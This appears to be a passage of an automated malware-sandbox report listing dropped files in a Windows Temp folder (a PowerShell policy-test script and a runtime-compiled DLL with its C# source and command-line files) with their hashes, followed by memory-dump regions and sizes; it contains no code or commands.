9c0ad5d5baee1b66c5020815c2295ffd5b97f153

SHA256
aabf14a26858b30d1d5a845477c4387c3a1af9a3687c70b35914f09369de3b06

SHA512
435f4a9a6aa40fca00097778580cf031dc966850e2d97ddbe9d37ee765c19bb119f2e36c9699f59e4f050fade71e546d511c5112bbebaeeb6400407816fca8bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1cffvxu.5fn.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\puac5sfh\puac5sfh.dll
Filesize
3KB

MD5
ba18e3c55f527638517b3f834dd8f1ec

SHA1
ec1a293588103348da8ca818a2bc7cd129022017

SHA256
a40a6c2b01462b35d2f1ea6b81f1399be1b5764d2c025e133039a00068ad6c23

SHA512
4483823c6cc3b27cbad4f95f1ca5da10e7be6a2af018d0e2bfc0b0933bb2536d2b789e893ada4ab97407930d9cdef21cb23274b20a6406851ee2acce8a2facc3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\puac5sfh\CSCD7008215C0BD4A219355344C867FDC5.TMP
Filesize
652B

MD5
01a10551ca8dd2072c934d756fa09f14

SHA1
db6d7f947ff6116abc72ffc659b4c8725c5797c1

SHA256
b55bdfa1a6b905c620f87526002fce7edfa1da8faf459b4a5f1b1f0d2177eb1f

SHA512
d19c2638cd0437d689b6fc42cbc39bdb51c5843d7e1b80b0adc03d6603552c09cd0f29eaa81d681b49214e1630fa1e5abc1d168f269074afe78de59e3bf85500

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\puac5sfh\puac5sfh.0.cs
Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\puac5sfh\puac5sfh.cmdline
Filesize
369B

MD5
b50f19be67a6846e64618c6f983c1eb9

SHA1
8e12524669c294544348262985a8b33c5420be2e

SHA256
1598dc7afa60125c83e1cf78c56628d873ebb0c0914cf9e733b5e50beabb4091

SHA512
cfcb449f55c9dd96d733e983716f141a501947a3471347abf5917e128f7da8adbf8f6b41b3f2c462c57570b7081625f91bf460e9e2667253276565458e94b951

Download Submit
\??\pipe\crashpad_4212_KVAFZPYIYACTZKMJ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2304-254-0x00007FFC74E60000-0x00007FFC7584C000-memory.dmp

Filesize
9.9MB

Download
memory/2304-29-0x00007FFC74E60000-0x00007FFC7584C000-memory.dmp

Filesize
9.9MB

Download
memory/2304-97-0x000001612F500000-0x000001612F510000-memory.dmp

Filesize
64KB

Download
memory/2304-96-0x00007FFC74E60000-0x00007FFC7584C000-memory.dmp

Filesize
9.9MB

Download
memory/2304-30-0x000001612F500000-0x000001612F510000-memory.dmp

Filesize
64KB

Download
memory/2304-31-0x000001612F500000-0x000001612F510000-memory.dmp

Filesize
64KB

Download
memory/3524-940-0x0000000009410000-0x0000000009418000-memory.dmp

Filesize
32KB

Download
memory/3808-5-0x00007FFC74E60000-0x00007FFC7584C000-memory.dmp

Filesize
9.9MB

Download
memory/3808-4-0x000002500A100000-0x000002500A122000-memory.dmp

Filesize
136KB

Download
memory/3808-7-0x0000025009CF0000-0x0000025009D00000-memory.dmp

Filesize
64KB

Download
memory/3808-93-0x00007FFC74E60000-0x00007FFC7584C000-memory.dmp

Filesize
9.9MB

Download
memory/3808-10-0x00000250225B0000-0x0000025022626000-memory.dmp

Filesize
472KB

Download
memory/3808-95-0x0000025009CF0000-0x0000025009D00000-memory.dmp

Filesize
64KB

Download
memory/3808-94-0x0000025009CF0000-0x0000025009D00000-memory.dmp

Filesize
64KB

Download
memory/3808-6-0x0000025009CF0000-0x0000025009D00000-memory.dmp

Filesize
64KB

Download
memory/3808-259-0x00007FFC74E60000-0x00007FFC7584C000-memory.dmp

Filesize
9.9MB

Download
memory/4140-1749-0x0000000009B40000-0x0000000009B48000-memory.dmp

Filesize
32KB

Download
memory/4868-53-0x00000000074A0000-0x0000000007AC8000-memory.dmp

Filesize
6.2MB

Download
memory/4868-75-0x0000000009DE0000-0x000000000A458000-memory.dmp

Filesize
6.5MB

Download
memory/4868-250-0x0000000009630000-0x0000000009631000-memory.dmp

Filesize
4KB

Download
memory/4868-91-0x0000000009630000-0x0000000009631000-memory.dmp

Filesize
4KB

Download
memory/4868-56-0x0000000007B40000-0x0000000007BA6000-memory.dmp

Filesize
408KB

Download
memory/4868-55-0x0000000007D20000-0x0000000007D86000-memory.dmp

Filesize
408KB

Download
memory/4868-89-0x00000000093C0000-0x00000000093C8000-memory.dmp

Filesize
32KB

Download
memory/4868-76-0x0000000009370000-0x000000000938A000-memory.dmp

Filesize
104KB

Download
memory/4868-54-0x0000000007470000-0x0000000007492000-memory.dmp

Filesize
136KB

Download
memory/4868-60-0x00000000085A0000-0x0000000008616000-memory.dmp

Filesize
472KB

Download
memory/4868-57-0x0000000007E50000-0x00000000081A0000-memory.dmp

Filesize
3.3MB

Download
memory/4868-52-0x0000000006D60000-0x0000000006D96000-memory.dmp

Filesize
216KB

Download
memory/4868-58-0x0000000007DB0000-0x0000000007DCC000-memory.dmp

Filesize
112KB

Download
memory/4868-59-0x0000000008660000-0x00000000086AB000-memory.dmp

Filesize
300KB

Download
memory/5352-1031-0x0000000008A30000-0x0000000008A38000-memory.dmp

Filesize
32KB

Download
memory/5880-951-0x0000000008BF0000-0x0000000008BF8000-memory.dmp

Filesize
32KB

Download
memory/6444-744-0x0000000009060000-0x0000000009068000-memory.dmp

Filesize
32KB

Download
memory/6604-815-0x0000000008AE0000-0x0000000008AE8000-memory.dmp

Filesize
32KB

Download
memory/6636-1653-0x0000000008DB0000-0x0000000008DB8000-memory.dmp

Filesize
32KB

Download
memory/7052-1178-0x0000000009930000-0x0000000009938000-memory.dmp

Filesize
32KB

Download
memory/7784-1099-0x0000000008C30000-0x0000000008C38000-memory.dmp

Filesize
32KB

Download